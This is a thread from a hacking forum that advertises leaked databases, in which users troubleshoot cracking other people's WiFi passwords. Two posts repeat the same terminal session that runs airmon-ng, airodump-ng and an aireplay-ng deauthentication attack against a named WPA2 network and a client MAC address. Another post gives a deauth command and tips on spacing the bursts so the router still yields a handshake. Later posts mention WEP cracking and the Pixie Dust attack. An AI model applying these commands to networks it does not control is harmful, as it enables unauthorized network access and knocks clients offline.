Create an account

Very important

  • To access the important data of the forums, you must be active in each forum and especially in the leaks and database leaks section, send data and after sending the data and activity, data and important content will be opened and visible for you.
  • You will only see chat messages from people who are at or below your level.
  • More than 500,000 database leaks and millions of account leaks are waiting for you, so access and view with more activity.
  • Many important data are inactive and inaccessible for you, so open them with activity. (This will be done automatically)


Thread Rating:
  • 188 Vote(s) - 3.47 Average
  • 1
  • 2
  • 3
  • 4
  • 5
How to Hack Wifi or Wireless Password

#91
Quote:(08-30-2012, 12:50 AM)unknown_user Wrote:

[To see links please register here]

[root@localhost unknownuser]# airmon-ng

Interface Chipset Driver

wlan0 Atheros ath5k - [phy0]
wlan1 Ralink 2573 USB rt73usb - [phy1]

[root@localhost unknownuser]# airmon-ng stop wlan1


Interface Chipset Driver

wlan0 Atheros ath5k - [phy0]
wlan1 Ralink 2573 USB rt73usb - [phy1]
(monitor mode disabled)

[root@localhost unknownuser]# airmon-ng start wlan1


Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
980 avahi-daemon
990 NetworkManager
1000 avahi-daemon
1136 wpa_supplicant
14876 dhclient
Process with PID 14876 (dhclient) is running on interface wlan0


Interface Chipset Driver

wlan0 Atheros ath5k - [phy0]
wlan1 Ralink 2573 USB rt73usb - [phy1]
(monitor mode enabled on mon0)

[root@localhost unknownuser]# airodump-ng mon0

CH 8 ][ Elapsed: 8 s ][ 2012-08-29 22:49

CH 8 ][ Elapsed: 8 s ][ 2012-08-29 22:49

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

28:10:7B:E8:CC:54 -76 10 0 0 13 54e. WPA2 CCMP PSK rekateemorputra1

BSSID STATION PWR Rate Lost Packets Probes

[root@localhost unknownuser]# aireplay-ng -0 1 -a 28:10:7B:E8:CC:54 -c 94:0C:6D:E1:83:0E mon0
08:58:01 Waiting for beacon frame (BSSID: 28:10:7B:E8:CC:54) on channel 1
08:58:11 No such BSSID available.
Please specify an ESSID (-e).

where i did wrong??

u are too far from the target , u need to close enough to the target ap
Reply

#92
Quote:(08-30-2012, 12:50 AM)unknown_user Wrote:

[To see links please register here]

[root@localhost unknownuser]# airmon-ng

Interface Chipset Driver

wlan0 Atheros ath5k - [phy0]
wlan1 Ralink 2573 USB rt73usb - [phy1]

[root@localhost unknownuser]# airmon-ng stop wlan1


Interface Chipset Driver

wlan0 Atheros ath5k - [phy0]
wlan1 Ralink 2573 USB rt73usb - [phy1]
(monitor mode disabled)

[root@localhost unknownuser]# airmon-ng start wlan1


Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
980 avahi-daemon
990 NetworkManager
1000 avahi-daemon
1136 wpa_supplicant
14876 dhclient
Process with PID 14876 (dhclient) is running on interface wlan0


Interface Chipset Driver

wlan0 Atheros ath5k - [phy0]
wlan1 Ralink 2573 USB rt73usb - [phy1]
(monitor mode enabled on mon0)

[root@localhost unknownuser]# airodump-ng mon0

CH 8 ][ Elapsed: 8 s ][ 2012-08-29 22:49

CH 8 ][ Elapsed: 8 s ][ 2012-08-29 22:49

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

28:10:7B:E8:CC:54 -76 10 0 0 13 54e. WPA2 CCMP PSK rekateemorputra1

BSSID STATION PWR Rate Lost Packets Probes

[root@localhost unknownuser]# aireplay-ng -0 1 -a 28:10:7B:E8:CC:54 -c 94:0C:6D:E1:83:0E mon0
08:58:01 Waiting for beacon frame (BSSID: 28:10:7B:E8:CC:54) on channel 1
08:58:11 No such BSSID available.
Please specify an ESSID (-e).

where i did wrong??

u are too far from the target , u need to close enough to the target ap
Reply

#93
Quote:(05-20-2011, 01:10 AM)m3taxpl0it Wrote:

[To see links please register here]

You might want to point out that if ivs are not being re-injected to the ap you might have to deauthenticate a client that is already associated with that ap. But remember do it to many one time it will be a DoS to that client.

Code:
aireplay-ng --deauth 10 -a (bssid) -c (client) ath0

Well this is proven not to be good technique deauth attack should be single in the start cause there is a chance the router be "smart" enough to understand that you spaming deauth packages and then never give you the Handshake. (TRUE STORY)
So better try 4-5 times with breaks :

Hidden Content
You must

[To see links please register here]

or

[To see links please register here]

to view this content.

Before you spam it... I just saying...


Now on the topic:
This tutorial has typos on commands(like ath0 probably means eth0, or more likely wlan0), it also doesn't have nice order on how to do the things you need to do with aircrack suite. We have better tutorial from this about aircrack if I am not mistaken. Avoid reading this one which in my opinion isn't well written and also isn't needed.

Quote:"i will explain you how to crack Wifi or wireless password in just 10 to 15 minutes"
LOL you can't know on how much they will do this, its depended on many things...For example a WEP with like 30 digits password without good signal could take even 2 days... Modify this please.
Reply

#94
An old tutorial - but still useful.
Especially since anyone can set their Encryption to WEP and attempt to crack it.

Pixie Dust is the latest attack though.
Reply

#95
Quote:(08-15-2014, 10:23 AM)L0aD1nG Wrote:

[To see links please register here]

This tutorial has typos on commands(like ath0 probably means eth0, or more likely wlan0)

ath0 means ath0, Atheros wireless device zero.
Reply



Forum Jump:


Users browsing this thread:
1 Guest(s)

©0Day  2016 - 2023 | All Rights Reserved.  Made with    for the community. Connected through